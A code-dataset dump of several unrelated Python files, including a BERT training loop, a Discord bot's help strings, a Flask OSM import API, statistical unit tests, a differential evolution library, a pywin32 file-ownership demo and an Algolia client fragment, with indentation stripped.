val_texts, val_labels, val_binary_labels, labels2idx, binary_labels2idx, val_batch_size, train=False)
print("Validation batches loaded")
train_batches_texts, train_batches_text_ids, \
train_batches_labels, train_batches_binary_labels, \
train_batches_mask, train_batches_label_masks = bnb.bucket_and_batch(
train_texts, train_labels, train_binary_labels, labels2idx, binary_labels2idx, train_batch_size)
print("Train batches loaded")
display_step = 100
example_display_step = 500
patience = 5
load = input("\nLoad checkpoint? y/n: ")
print("")
if load.lower() == 'y':
print('Loading pre-trained weights for the model...')
checkpoint = T.load("../Model_Backup/{}.pt".format(model_name))
model.load_state_dict(checkpoint['model_state_dict'])
optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
scheduler.load_state_dict(checkpoint['scheduler_state_dict'])
past_epoch = checkpoint['past epoch']
best_val_F1 = checkpoint['best F1']
best_val_cost = checkpoint['best loss']
impatience = checkpoint['impatience']
meta_impatience = checkpoint['meta_impatience']
print('\nRESTORATION COMPLETE\n')
else:
past_epoch = 0
best_val_cost = math.inf
best_val_F1 = -math.inf
impatience = 0
meta_impatience = 0
for epoch in range(past_epoch, epochs):
batches_indices = [i for i in range(0, len(train_batches_texts))]
random.shuffle(batches_indices)
total_train_loss = 0
total_F1 = 0
for i in range(len(train_batches_texts)):
j = int(batches_indices[i])
# with T.autograd.detect_anomaly():
predictions, binary_predictions, loss = predict(text_ids=train_batches_text_ids[j],
labels=train_batches_labels[j],
binary_labels=train_batches_binary_labels[j],
input_mask=train_batches_mask[j],
label_mask=train_batches_label_masks[j],
train=True)
loss = loss/accu_step
loss.backward()
if (i+1) % accu_step == 0:
# Update accumulated gradients
T.nn.utils.clip_grad_norm_(parameters+BERT_parameters, max_grad_norm)
optimizer.step()
optimizer.zero_grad()
labels = train_batches_labels[j].tolist()
binary_labels = train_batches_binary_labels[j].tolist()
predictions = predictions.tolist()
binary_predictions = binary_predictions.tolist()
label_masks = train_batches_label_masks[j].tolist()
binary_prec, binary_rec, binary_acc = eval.binary_metrics(binary_predictions, binary_labels)
prec, rec, acc = eval.multi_metrics(predictions, labels, label_masks, idx2labels)
binary_F1 = eval.compute_F1(binary_prec, binary_rec)
F1 = eval.compute_F1(prec, rec)
cost = loss.item()
if i % display_step == 0:
print("Iter "+str(i)+", Cost = " +
"{:.3f}".format(cost)+", Binary F1 = " +
"{:.3f}".format(binary_F1)+", Multi-F1 = " +
"{:.3f}".format(F1)+", Binary Accuracy = " +
"{:.3f}".format(binary_acc)+", Accuracy = " +
"{:.3f}".format(acc))
if i % example_display_step == 0:
display(train_batches_texts[j],
predictions, labels,
binary_predictions, binary_labels,
label_masks)
print("\n\n")
total_val_cost = 0
batch_labels = []
batch_binary_labels = []
batch_predictions = []
batch_binary_predictions = []
batch_label_masks = []
for i in range(0, len(val_batches_texts)):
if i % display_step == 0:
print("Validating Batch {}".format(i+1))
with T.no_grad():
predictions, binary_predictions, loss = predict(text_ids=val_batches_text_ids[i],
labels=val_batches_labels[i],
binary_labels=val_batches_binary_labels[i],
input_mask=val_batches_mask[i],
label_mask=val_batches_label_masks[i],
train=False)
cost = loss.item()
total_val_cost += cost
predictions = predictions.tolist()
binary_predictions = binary_predictions.tolist()
labels = val_batches_labels[i].tolist()
binary_labels = val_batches_binary_labels[i].tolist()
label_masks = val_batches_label_masks[i].tolist()
batch_labels += labels
batch_binary_labels += binary_labels
batch_predictions += predictions
batch_binary_predictions += binary_predictions
batch_label_masks += label_masks
if i % example_display_step == 0:
display(val_batches_texts[i],
predictions, labels,
binary_predictions, binary_labels,
label_masks)
binary_prec, binary_rec, binary_acc = eval.binary_metrics(batch_binary_predictions,
batch_binary_labels)
prec, rec, acc = eval.multi_metrics(
batch_predictions, batch_labels, batch_label_masks, idx2labels)
binary_val_F1 = eval.compute_F1(binary_prec, binary_rec)
val_F1 = eval.compute_F1(prec, rec)
val_len = len(val_batches_texts)
avg_val_cost = total_val_cost/val_len
print("\n\nVALIDATION\n\n")
print("Epoch "+str(epoch)+":, Cost = " +
"{:.3f}".format(avg_val_cost)+", Binary F1 = " +
"{:.3f}".format(binary_val_F1)+", Multi-F1 = " +
"{:.3f}".format(val_F1)+", Binary Accuracy = " +
"{:.3f}".format(binary_acc)+", Accuracy = " +
"{:.3f}".format(acc))
flag = 0
impatience += 1
if avg_val_cost < best_val_cost:
impatience = 0
best_val_cost = avg_val_cost
if val_F1 >= best_val_F1:
impatience = 0
best_val_F1 = val_F1
flag = 1
if flag == 1:
T.save({
'past epoch': epoch+1,
'best loss': best_val_cost,
'best F1': best_val_F1,
'impatience': impatience,
'meta_impatience': meta_impatience,
'model_state_dict': model.state_dict(),
'optimizer_state_dict': optimizer.state_dict(),
'scheduler_state_dict': scheduler.state_dict(),
}, "../Model_Backup/{}.pt".format(model_name))
print("Checkpoint created!")
print("\n")
if impatience > patience:
scheduler.step()
meta_impatience += 1
if meta_impatience > 1:
break
|
502994 | title = "All my commands, peko!"
description = "If you have any problems with me, feel free to contact the creator on Discord (bemxio#5847) or on Reddit (u/bemxioo) peko!"
invite = "Here's my invite link peko! https://discord.com/api/oauth2/authorize?client_id=817481976797069383&permissions=116736&scope=bot"
dm_check = "Check your DMs peko!"
help = {
"helpeko": {
"usage": "!helpeko",
"description": "Sends you all of this onto your DMs!"
},
"pekofy": {
"usage": "!pekofy",
"description": "Pekofies the message that you replied to, making it sound like a certain rabbit war criminal..."
},
"pekopasta": {
"usage": "!pekopasta",
"description": "Summons a Pekora cosplay copypasta onto the current channel."
},
"insult me peko": {
"usage": "insult me peko",
"description": "Insults you, feeding your masochistic tendencies, peko~"
},
"credits": {
"usage": "!credits",
"description": "Sends you a list of all the people who helped make me exist!"
},
"invite": {
"usage": "!invite",
"description": "Sends you a link to invite me to your server!"
}
}
credits = """```
First of all, thanks to Heroku, for making me have a little place to live on peko!
Thank you, denki, for helping with my verification peko, so that I could join more than 100 servers!
and thank you, all of you that are reading this, for using me and having fun with me! I love you all peko! <3
- pekofy_bot
```""" |
503014 | import re
from datetime import datetime, timedelta
import json
from flask import request, Response
from flask_restful import Resource, abort
from lxml import etree
from common import util
from common import objects
class Processes(Resource):
"""Lists processes (data update)."""
def get(self):
list_of_processes = objects.processes.status()
return {'processes': [p.as_dict() for p in list_of_processes]}
class Exclude(Resource):
"""Endpoint for reporting addresses or buildings that are not fit for import into OSM."""
def post(self):
r = request.get_json()
exclude_prg_addresses = r.get('exclude_prg_addresses')
exclude_bdot_buildings = r.get('exclude_bdot_buildings')
geojson_geometry_string = r.get('geom')
if geojson_geometry_string:
if exclude_prg_addresses:
objects.addresses.report_addresses_in_polygon(geojson_geometry_string)
if exclude_bdot_buildings:
objects.buildings.report_buildings_in_polygon(geojson_geometry_string)
return {}, 201
else:
# keep old path for compatibility
prg_counter, lod1_counter = 0, 0
if r.get('prg_ids'):
prg_ids = r['prg_ids']
objects.addresses.report_addresses(prg_ids)
prg_counter = len(prg_ids)
if r.get('bdot_ids'):
bdot_ids = r['bdot_ids']
objects.buildings.report_buildings(bdot_ids)
lod1_counter = len(bdot_ids)
return {'prg_ids_inserted': prg_counter, 'bdot_ids_inserted': lod1_counter}, 201
class RandomLocation(Resource):
"""Returns random location (lon, lat) while prioritizing (95% chance) areas with a lot of objects to export."""
def get(self):
point = objects.locations.random_location()
return {'lon': point.longitude, 'lat': point.latitude}
class MapboxVectorTile(Resource):
"""Returns vector tile (MVT) with data which can be displayed on the map."""
def get(self, z: int, x: int, y: int):
tile = objects.tiles.select(z, x, y)
if tile is None:
if 6 <= int(z) <= 14:
objects.tiles.generate_if_not_exists(z, x, y)
else:
abort(404)
tile = objects.tiles.select(z, x, y)
mvt = tile.data if tile is not None else abort(500)
# prepare and return response
response = Response(mvt, status=200, content_type='application/x-protobuf')
if 6 <= int(z) < 9:
response.headers['X-Accel-Expires'] = '120'
elif 10 <= int(z) < 23:
response.headers['X-Accel-Expires'] = '60'
return response
class MarkTileForReload(Resource):
"""Marks MVT to be reloaded with next data update."""
def get(self, z: int, x: int, y: int):
objects.tiles.queue_for_reload(z, x, y)
return 'OK', 201
class AvailableLayers(Resource):
"""Provides list of ids of available layers with data to download."""
def get(self):
return {
'available_layers': objects.layers.Layers().active_ids_with_names
}
class JosmData(Resource):
"""Returns data for given area as an osm file."""
def get(self):
geojson_geometry_string = ''
layers = objects.layers.Layers()
selected_layers = layers.selected_layers(request.args.get('layers', ''))
if len(selected_layers) == 0:
abort(400)
if request.args.get('filter_by') == 'bbox':
bbox = (
float(request.args.get('xmin')), float(request.args.get('ymin')),
float(request.args.get('xmax')), float(request.args.get('ymax'))
)
geojson_geometry_string = json.dumps(util.bbox_to_geojson_geometry(bbox))
elif request.args.get('filter_by') == 'geojson_geometry':
geojson_geometry_string = request.args.get('geom')
# todo: validate geometry
elif request.args.get('filter_by') == 'osm_boundary':
if request.args.get('teryt_terc') and re.match(r'^\d{2,7}$', request.args.get('teryt_terc')):
terc = request.args.get('teryt_terc')
geojson_geometry_string = objects.osm_admin_boundaries.select_where_terc(terc_code=terc)[0].value
elif request.args.get('teryt_simc') and re.match(r'^\d{7}$', request.args.get('teryt_simc')):
simc = request.args.get('teryt_simc')
geojson_geometry_string = objects.osm_admin_boundaries.select_where_simc(simc_code=simc)[0].value
elif request.args.get('relation_id') and re.match(r'^\d+$', request.args.get('relation_id')):
relation_id = int(request.args.get('relation_id'))
geojson_geometry_string = objects.osm_admin_boundaries.select_where_id(relation_id=relation_id)[0].value
else:
abort(400)
else:
abort(400)
data = objects.layers.select_data_for_layers([(layer, {'geojson_geometry': geojson_geometry_string}) for layer in selected_layers])
list_of_features = [values for layer_id, layer_data in data.items() for values in layer_data.data]
root = util.create_osm_xml(list_of_features)
package_export_params = {'geojson_geometry': geojson_geometry_string}
for layer_id, layer_data in data.items():
if layers[layer_id].export_parameter_name:
package_export_params[layers[layer_id].export_parameter_name] = layer_data.count
required_parameters = ['lb_adresow', 'lb_budynkow']
for param in required_parameters:
if package_export_params.get(param) is None:
package_export_params[param] = 0
objects.layers.register_export(**package_export_params)
return Response(
etree.tostring(root, encoding='UTF-8'),
mimetype='text/xml',
headers={'Content-disposition': 'attachment; filename=paczka_danych.osm'})
class LatestUpdates(Resource):
"""Returns areas that has recently been updated in OSM or areas that were exported as JOSM data package."""
def get(self):
ts = request.args.get('after')
if ts is None:
ts = datetime.now() - timedelta(minutes=60)
else:
try:
ts = datetime.fromisoformat(ts)
except:
abort(400)
if ts - datetime.now() > timedelta(hours=24, minutes=5):
abort(400)
list_of_updates = objects.updates.latest_updates(ts)
list_of_geometries = [u.area for u in list_of_updates]
list_of_properties = [
{'dataset': u.dataset, 'created_at': u.created_at, 'changesets': u.changesets} for u in list_of_updates
]
response_dict = util.create_geojson_dict(list_of_geometries, list_of_properties)
# prepare and return response
expiry_time = ts + timedelta(seconds=60)
response = Response(
response=json.dumps(response_dict),
status=200,
content_type='application/geo+json',
headers={
'X-Accel-Expires': '60',
'Expires': expiry_time.strftime("%a, %d %b %Y %H:%M:%S GMT"),
}
)
return response
|
503124 | import json
corpus = {}
with open("final.json","r") as fh:
corpus = json.load(fh)
act_tags = []
topics = []
for season_episode in corpus:
season,episode = season_episode.split("_")
for scene in corpus[season_episode]:
for turn in scene["Turns"]:
print(turn["Speaker"])
if turn["Act_Tag"][0] not in act_tags:
act_tags.append(turn["Act_Tag"][0])
if turn["Topics"]:
for t in turn["Topics"]:
if t not in topics:
topics.append(t)
with open("info.json","w") as fh:
json.dump(act_tags,fh)
with open("info1.json","w") as fh:
json.dump(topics,fh) |
503156 | import unittest
import numpy as np
import scipy.stats as st
from ..data import Vector
from ..analysis import TwoSampleKSTest
from ..analysis.exc import MinimumSizeError, NoDataError
class TestTwoSampleKS(unittest.TestCase):
def test_two_sample_KS_matched(self):
"""Test the Two Sample KS Test with matched samples"""
np.random.seed(987654321)
x_parms = [1.7]
y_parms = [1.7]
x_input = st.weibull_min.rvs(*x_parms, size=20)
y_input = st.weibull_min.rvs(*y_parms, size=20)
alpha = 0.05
exp = TwoSampleKSTest(x_input, y_input, alpha=alpha, display=False)
output = """
Two Sample Kolmogorov-Smirnov Test
----------------------------------
alpha = 0.0500
D value = 0.2000
p value = 0.7710
H0: Both samples come from the same distribution
"""
self.assertGreater(exp.p_value, alpha, "FAIL: Two Sample KS Test Type I error")
self.assertEqual(str(exp), output)
def test_two_sample_KS_unmatched(self):
"""Test the Two Sample KS Test with unmatched samples"""
np.random.seed(987654321)
x_parms = [1.7]
y_parms = [8.2]
x_input = st.weibull_min.rvs(*x_parms, size=20)
y_input = st.weibull_min.rvs(*y_parms, size=20)
alpha = 0.06
exp = TwoSampleKSTest(x_input, y_input, alpha=alpha, display=False)
output = """
Two Sample Kolmogorov-Smirnov Test
----------------------------------
alpha = 0.0600
D value = 0.4000
p value = 0.0591
HA: Samples do not come from the same distribution
"""
self.assertLess(exp.p_value, alpha, "FAIL: Two Sample KS Test Type II error")
self.assertEqual(str(exp), output)
def test_two_sample_KS_statistic(self):
"""Test the Two Sample KS Test test statistic"""
np.random.seed(987654321)
x_parms = [1.7]
y_parms = [1.7]
x_input = st.weibull_min.rvs(*x_parms, size=20)
y_input = st.weibull_min.rvs(*y_parms, size=20)
alpha = 0.05
exp = TwoSampleKSTest(x_input, y_input, alpha=alpha, display=False)
self.assertAlmostEqual(exp.statistic, 0.2, delta=0.1, msg="FAIL: Two Sample KS Test statistic")
self.assertAlmostEqual(exp.d_value, 0.2, delta=0.1, msg="FAIL: Two Sample KS Test d_value")
self.assertAlmostEqual(exp.p_value, 0.771, delta=0.001, msg="FAIL: Two Sample KS Test p_value")
def test_two_sample_KS_matched_at_min_size(self):
"""Test the Two Sample KS Test with matched samples at the minimum size"""
np.random.seed(987654321)
x_parms = [1.7]
y_parms = [1.7]
x_input = st.weibull_min.rvs(*x_parms, size=2)
y_input = st.weibull_min.rvs(*y_parms, size=2)
alpha = 0.05
self.assertRaises(MinimumSizeError, lambda: TwoSampleKSTest(x_input, y_input, alpha=alpha, display=False))
def test_two_sample_KS_matched_just_above_min_size(self):
"""Test the Two Sample KS Test with matched samples just above the minimum size"""
np.random.seed(987654321)
x_parms = [1.7]
y_parms = [1.7]
x_input = st.weibull_min.rvs(*x_parms, size=3)
y_input = st.weibull_min.rvs(*y_parms, size=3)
alpha = 0.05
exp = TwoSampleKSTest(x_input, y_input, alpha=alpha, display=True)
output = """
Two Sample Kolmogorov-Smirnov Test
----------------------------------
alpha = 0.0500
D value = 0.6667
p value = 0.3197
H0: Both samples come from the same distribution
"""
self.assertAlmostEqual(exp.p_value, 0.3197, delta=0.0001)
self.assertAlmostEqual(exp.statistic, 0.6667, delta=0.0001)
self.assertEqual(str(exp), output)
def test_two_sample_KS_matched_empty(self):
"""Test the Two Sample KS Test with empty vectors"""
np.random.seed(987654321)
x_input = [np.nan, np.nan, "one", np.nan]
y_input = ["one", "two", "three", "four"]
alpha = 0.05
self.assertRaises(NoDataError, lambda: TwoSampleKSTest(x_input, y_input, alpha=alpha, display=False))
def test_two_sample_KS_vector_input(self):
"""Test the Two Sample KS Test with a Vector object."""
np.random.seed(987654321)
x_parms = [1.7]
y_parms = [1.7]
x_input = st.weibull_min.rvs(*x_parms, size=20)
y_input = st.weibull_min.rvs(*y_parms, size=20)
vector = Vector(x_input).append(Vector(y_input))
alpha = 0.05
exp = TwoSampleKSTest(vector, alpha=alpha, display=False)
output = """
Two Sample Kolmogorov-Smirnov Test
----------------------------------
alpha = 0.0500
D value = 0.2000
p value = 0.7710
H0: Both samples come from the same distribution
"""
self.assertGreater(exp.p_value, alpha, "FAIL: Two Sample KS Test Type I error")
self.assertEqual(str(exp), output)
def test_two_sample_KS_with_missing_second_arg(self):
"""Test the case where the second argument is None."""
np.random.seed(987654321)
x_parms = [1.7]
x_input = st.weibull_min.rvs(*x_parms, size=20)
self.assertRaises(AttributeError, lambda: TwoSampleKSTest(x_input))
if __name__ == '__main__':
unittest.main()
|
503164 | import numpy as np
from typing import Callable, Union, List, Tuple, Any
def keep_bounds(population: np.ndarray,
bounds: np.ndarray) -> np.ndarray:
"""
Constrains the population to its proper limits.
Any value outside its bounded ranged is clipped.
:param population: Current population that may not be constrained.
:type population: np.ndarray
:param bounds: Numpy array of tuples (min, max).
Each tuple represents a gen of an individual.
:type bounds: np.ndarray
:rtype np.ndarray
:return: Population constrained within its bounds.
"""
minimum = [bound[0] for bound in bounds]
maximum = [bound[1] for bound in bounds]
return np.clip(population, minimum, maximum)
def init_population(population_size: int, individual_size: int,
bounds: Union[np.ndarray, list]) -> np.ndarray:
"""
Creates a random population within its constrained bounds.
:param population_size: Number of individuals desired in the population.
:type population_size: int
:param individual_size: Number of features/gens.
:type individual_size: int
:param bounds: Numpy array of tuples (min, max).
Each tuple represents a gen of an individual.
:type bounds: Union[np.ndarray, list]
:rtype: np.ndarray
:return: Initialized population.
"""
population = np.random.randn(population_size, individual_size)
return keep_bounds(population, bounds)
def apply_fitness(population: np.ndarray,
func: Callable[[np.ndarray], float],
opts: Any) -> np.ndarray:
"""
Applies the given fitness function to each individual of the population.
:param population: Population to apply the current fitness function.
:type population: np.ndarray
:param func: Function that is used to calculate the fitness.
:type func: np.ndarray
:param opts: Optional parameters for the fitness function.
:type opts: Any type.
:rtype np.ndarray
:return: Numpy array of fitness for each individual.
"""
if opts is None:
return np.array([func(individual) for individual in population])
else:
return np.array([func(individual, opts) for individual in population])
def __parents_choice(population: np.ndarray, n_parents: int) -> np.ndarray:
pob_size = population.shape[0]
choices = np.indices((pob_size, pob_size))[1]
mask = np.ones(choices.shape, dtype=bool)
np.fill_diagonal(mask, 0)
choices = choices[mask].reshape(pob_size, pob_size - 1)
parents = np.array([np.random.choice(row, n_parents, replace=False) for row in choices])
return parents
def binary_mutation(population: np.ndarray,
f: Union[int, float],
bounds: np.ndarray) -> np.ndarray:
"""
Calculate the binary mutation of the population. For each individual (n),
3 random parents (x,y,z) are selected. The parents are guaranteed to not
be in the same position than the original. New individual are created by
n = z + F * (x-y)
:param population: Population to apply the mutation
:type population: np.ndarray
:param f: Parameter of control of the mutation. Must be in [0, 2].
:type f: Union[int, float]
:param bounds: Numpy array of tuples (min, max).
Each tuple represents a gen of an individual.
:type bounds: np.ndarray
:rtype: np.ndarray
:return: Mutated population
"""
# If there's not enough population we return it without mutating
if len(population) <= 3:
return population
# 1. For each number, obtain 3 random integers that are not the number
parents = __parents_choice(population, 3)
# 2. Apply the formula to each set of parents
mutated = f * (population[parents[:, 0]] - population[parents[:, 1]])
mutated += population[parents[:, 2]]
return keep_bounds(mutated, bounds)
def current_to_best_2_binary_mutation(population: np.ndarray,
population_fitness: np.ndarray,
f: Union[int, float],
bounds: np.ndarray) -> np.ndarray:
"""
Calculates the mutation of the entire population based on the
"current to best/2/bin" mutation. This is
V_{i, G} = X_{i, G} + F * (X_{best, G} - X_{i, G} + F * (X_{r1. G} - X_{r2, G}
:param population: Population to apply the mutation
:type population: np.ndarray
:param population_fitness: Fitness of the given population
:type population_fitness: np.ndarray
:param f: Parameter of control of the mutation. Must be in [0, 2].
:type f: Union[int, float]
:param bounds: Numpy array of tuples (min, max).
Each tuple represents a gen of an individual.
:type bounds: np.ndarray
:rtype: np.ndarray
:return: Mutated population
"""
# If there's not enough population we return it without mutating
if len(population) < 3:
return population
# 1. We find the best parent
best_index = np.argmin(population_fitness)
# 2. We choose two random parents
parents = __parents_choice(population, 2)
mutated = population + f * (population[best_index] - population)
mutated += f * (population[parents[:, 0]] - population[parents[:, 1]])
return keep_bounds(mutated, bounds)
def current_to_pbest_mutation(population: np.ndarray,
population_fitness: np.ndarray,
f: List[float],
p: Union[float, np.ndarray, int],
bounds: np.ndarray) -> np.ndarray:
"""
Calculates the mutation of the entire population based on the
"current to p-best" mutation. This is
V_{i, G} = X_{i, G} + F * (X_{p_best, G} - X_{i, G} + F * (X_{r1. G} - X_{r2, G}
:param population: Population to apply the mutation
:type population: np.ndarray
:param population_fitness: Fitness of the given population
:type population_fitness: np.ndarray
:param f: Parameter of control of the mutation. Must be in [0, 2].
:type f: Union[int, float]
:param p: Percentage of population that can be a p-best. Muest be in (0, 1).
:type p: Union[int, float, np.ndarray]
:param bounds: Numpy array of tuples (min, max).
Each tuple represents a gen of an individual.
:type bounds: np.ndarray
:rtype: np.ndarray
:return: Mutated population
"""
# If there's not enough population we return it without mutating
if len(population) < 4:
return population
# 1. We find the best parent
p_best = []
for p_i in p:
best_index = np.argsort(population_fitness)[:max(2, int(round(p_i*len(population))))]
p_best.append(np.random.choice(best_index))
p_best = np.array(p_best)
# 2. We choose two random parents
parents = __parents_choice(population, 2)
mutated = population + f * (population[p_best] - population)
mutated += f * (population[parents[:, 0]] - population[parents[:, 1]])
return keep_bounds(mutated, bounds)
def current_to_rand_1_mutation(population: np.ndarray,
population_fitness: np.ndarray,
k: List[float],
f: List[float],
bounds: np.ndarray) -> np.ndarray:
"""
Calculates the mutation of the entire population based on the
"current to rand/1" mutation. This is
U_{i, G} = X_{i, G} + K * (X_{r1, G} - X_{i, G} + F * (X_{r2. G} - X_{r3, G}
:param population: Population to apply the mutation
:type population: np.ndarray
:param population_fitness: Fitness of the given population
:type population_fitness: np.ndarray
:param f: Parameter of control of the mutation. Must be in [0, 2].
:type f: Union[int, float]
:param p: Percentage of population that can be a p-best. Muest be in (0, 1).
:type p: Union[int, float]
:param bounds: Numpy array of tuples (min, max).
Each tuple represents a gen of an individual.
:type bounds: np.ndarray
:rtype: np.ndarray
:return: Mutated population
"""
# If there's not enough population we return it without mutating
if len(population) <= 3:
return population
# 1. For each number, obtain 3 random integers that are not the number
parents = __parents_choice(population, 3)
# 2. Apply the formula to each set of parents
mutated = k * (population[parents[:, 0]] - population)
mutated += f * (population[parents[:, 1]] - population[parents[:, 2]])
return keep_bounds(mutated, bounds)
def current_to_pbest_weighted_mutation(population: np.ndarray,
population_fitness: np.ndarray,
f: np.ndarray,
f_w: np.ndarray,
p: float,
bounds: np.ndarray) -> np.ndarray:
"""
Calculates the mutation of the entire population based on the
"current to p-best weighted" mutation. This is
V_{i, G} = X_{i, G} + F_w * (X_{p_best, G} - X_{i, G} + F * (X_{r1. G} - X_{r2, G}
:param population: Population to apply the mutation
:type population: np.ndarray
:param population_fitness: Fitness of the given population
:type population_fitness: np.ndarray
:param f: Parameter of control of the mutation. Must be in [0, 2].
:type f: np.ndarray
:param f_w: NumPy Array with the weighted version of the mutation array
:type f_w: np.ndarray
:param p: Percentage of population that can be a p-best. Muest be in (0, 1).
:type p: Union[int, float]
:param bounds: Numpy array of tuples (min, max).
Each tuple represents a gen of an individual.
:type bounds: np.ndarray
:rtype: np.ndarray
:return: Mutated population
"""
# If there's not enough population we return it without mutating
if len(population) < 4:
return population
# 1. We find the best parent
best_index = np.argsort(population_fitness)[:max(2, round(p*len(population)))]
p_best = np.random.choice(best_index, len(population))
# 2. We choose two random parents
parents = __parents_choice(population, 2)
mutated = population + f_w * (population[p_best] - population)
mutated += f * (population[parents[:, 0]] - population[parents[:, 1]])
return keep_bounds(mutated, bounds)
def crossover(population: np.ndarray, mutated: np.ndarray,
cr: Union[int, float]) -> np.ndarray:
"""
Crosses gens from individuals of the last generation and the mutated ones
based on the crossover rate. Binary crossover
:param population: Previous generation population.
:type population: np.ndarray
:param mutated: Mutated population.
:type population: np.ndarray
:param cr: Crossover rate. Must be in [0,1].
:type population: Union[int, float]
:rtype: np.ndarray
:return: Current generation population.
"""
chosen = np.random.rand(*population.shape)
j_rand = np.random.randint(0, population.shape[1])
chosen[j_rand::population.shape[1]] = 0
return np.where(chosen <= cr, mutated, population)
def exponential_crossover(population: np.ndarray, mutated: np.ndarray,
cr: Union[int, float]) -> np.ndarray:
"""
Crosses gens from individuals of the last generation and the mutated ones
based on the crossover rate. Exponential crossover.
:param population: Previous generation population.
:type population: np.ndarray
:param mutated: Mutated population.
:type population: np.ndarray
:param cr: Crossover rate. Must be in [0,1].
:type population: Union[int, float]
:rtype: np.ndarray
:return: Current generation population.
"""
if type(cr) is int or float:
cr = np.array([cr] * len(population))
else:
cr = cr.flatten()
def __exponential_crossover_1(x: np.ndarray, y: np.ndarray, cr: Union[int, float]) -> np.ndarray:
z = x.copy()
n = len(x)
k = np.random.randint(0, n)
j = k
l = 0
while True:
z[j] = y[j]
j = (j + 1) % n
l += 1
if np.random.randn() >= cr or l == n:
return z
return np.array([__exponential_crossover_1(population[i], mutated[i], cr.flatten()[i]) for i in range(len(population))])
def selection(population: np.ndarray, new_population: np.ndarray,
fitness: np.ndarray, new_fitness: np.ndarray,
return_indexes: bool=False) -> Union[np.ndarray, Tuple[np.ndarray, np.ndarray]]:
"""
Selects the best individuals based on their fitness.
:param population: Last generation population.
:type population: np.ndarray
:param new_population: Current generation population.
:type new_population: np.ndarray
:param fitness: Last generation fitness.
:type fitness: np.ndarray
:param new_fitness: Current generation fitness
:param return_indexes: When active the function also returns the individual indexes that have been modified
:type return_indexes: bool
:rtype: ndarray
:return: The selection of the best of previous generation
and mutated individual for the entire population and optionally, the indexes changed
"""
indexes = np.where(fitness > new_fitness)[0]
population[indexes] = new_population[indexes]
if return_indexes:
return population, indexes
else:
return population
|
503172 | fname = r"h:\tmp.txt"
import win32security, win32file, win32api, ntsecuritycon, win32con
new_privs = (
(
win32security.LookupPrivilegeValue("", ntsecuritycon.SE_SECURITY_NAME),
win32con.SE_PRIVILEGE_ENABLED,
),
(
win32security.LookupPrivilegeValue("", ntsecuritycon.SE_SHUTDOWN_NAME),
win32con.SE_PRIVILEGE_ENABLED,
),
(
win32security.LookupPrivilegeValue("", ntsecuritycon.SE_TCB_NAME),
win32con.SE_PRIVILEGE_ENABLED,
),
(
win32security.LookupPrivilegeValue("", ntsecuritycon.SE_RESTORE_NAME),
win32con.SE_PRIVILEGE_ENABLED,
),
(
win32security.LookupPrivilegeValue("", ntsecuritycon.SE_TAKE_OWNERSHIP_NAME),
win32con.SE_PRIVILEGE_ENABLED,
),
(
win32security.LookupPrivilegeValue("", ntsecuritycon.SE_CREATE_PERMANENT_NAME),
win32con.SE_PRIVILEGE_ENABLED,
),
(
win32security.LookupPrivilegeValue("", "SeEnableDelegationPrivilege"),
win32con.SE_PRIVILEGE_ENABLED,
), ##doesn't seem to be in ntsecuritycon.py ?
)
ph = win32api.GetCurrentProcess()
th = win32security.OpenProcessToken(
ph, win32security.TOKEN_ALL_ACCESS | win32con.TOKEN_ADJUST_PRIVILEGES
)
win32security.AdjustTokenPrivileges(th, 0, new_privs)
all_security_info = (
win32security.OWNER_SECURITY_INFORMATION
| win32security.GROUP_SECURITY_INFORMATION
| win32security.DACL_SECURITY_INFORMATION
| win32security.SACL_SECURITY_INFORMATION
)
sd = win32security.GetFileSecurity(fname, all_security_info)
old_dacl = sd.GetSecurityDescriptorDacl()
old_sacl = sd.GetSecurityDescriptorSacl()
old_group = sd.GetSecurityDescriptorGroup()
new_sd = win32security.SECURITY_DESCRIPTOR()
print(
"relative, valid, size: ",
new_sd.IsSelfRelative(),
new_sd.IsValid(),
new_sd.GetLength(),
)
my_sid = win32security.GetTokenInformation(th, ntsecuritycon.TokenUser)[0]
tmp_sid = win32security.LookupAccountName("", "tmp")[0]
new_sd.SetSecurityDescriptorSacl(1, old_sacl, 1)
new_sd.SetSecurityDescriptorDacl(1, old_dacl, 1)
new_sd.SetSecurityDescriptorOwner(tmp_sid, 0)
new_sd.SetSecurityDescriptorGroup(old_group, 0)
win32security.SetFileSecurity(fname, all_security_info, new_sd)
|
503188 | from typing import Set, Type
from arrakisclient.types.namespace import ArrakisNamespace, Relation
class ReferenceableNamespace(ArrakisNamespace):
ellipsis = Relation(relation_name="...")
class User(ReferenceableNamespace):
__namespace__ = "testtenant/user"
class UserGroup(ArrakisNamespace):
__namespace__ = "testtenant/usergroup"
admin = Relation(User)
member = Relation(User)
class ViewableEditable(ArrakisNamespace):
view = Relation(UserGroup)
edit = Relation(UserGroup)
class Deletable(ArrakisNamespace):
delete = Relation(UserGroup)
class Document(ViewableEditable, Deletable):
__namespace__ = "testtenant/document"
def relations(ns: Type[ArrakisNamespace]) -> Set[str]:
return {rel.relation_name for rel in ns.__relations__}
def test_inherited_relations():
assert "..." in relations(User)
assert "admin" in relations(UserGroup)
assert "member" in relations(UserGroup)
assert "view" in relations(Document)
assert "edit" in relations(Document)
assert "delete" in relations(Document)
def test_relation_parent_class():
assert "User" == User.ellipsis.parent_class_name
assert "ViewableEditable" == ViewableEditable.view.parent_class_name
assert "Document" == Document.delete.parent_class_name
|
503195 | import time
from typing import Optional, Union, Dict, Any, List
from algoliasearch.exceptions import AlgoliaUnreachableHostException, RequestException
from algoliasearch.http.hosts import Host
from algoliasearch.http.request_options import RequestOptions
from algoliasearch.configs import Config
from algoliasearch.http.serializer import QueryParametersSerializer, DataSerializer
from algoliasearch.http.verb import Verb
try:
from algoliasearch.http.requester import Requester
except ImportError: # Already imported.
pass
class Transporter(object):
def __init__(self, requester, config):
# type: (Requester, Config) -> None
self._requester = requester
self._config = config
self._retry_strategy = RetryStrategy()
def write(self, verb, path, data, request_options):
# type: (str, str, Optional[Union[dict, list]], Optional[Union[dict, RequestOptions]]) -> dict # noqa: E501
if request_options is None or isinstance(request_options, dict):
request_options = RequestOptions.create(self._config, request_options)
timeout = request_options.timeouts["writeTimeout"]
hosts = self._config.hosts.write()
return self.request(verb, hosts, path, data, request_options, timeout)
def read(self, verb, path, data, request_options):
# type: (str, str, Optional[Union[dict, list]], Optional[Union[dict, RequestOptions]]) -> dict # noqa: E501
if request_options is None or isinstance(request_options, dict):
request_options = RequestOptions.create(self._config, request_options)
timeout = request_options.timeouts["readTimeout"]
hosts = self._config.hosts.read()
return self.request(verb, hosts, path, data, request_options, timeout)
def request(self, verb, hosts, path, data, request_options, timeout):
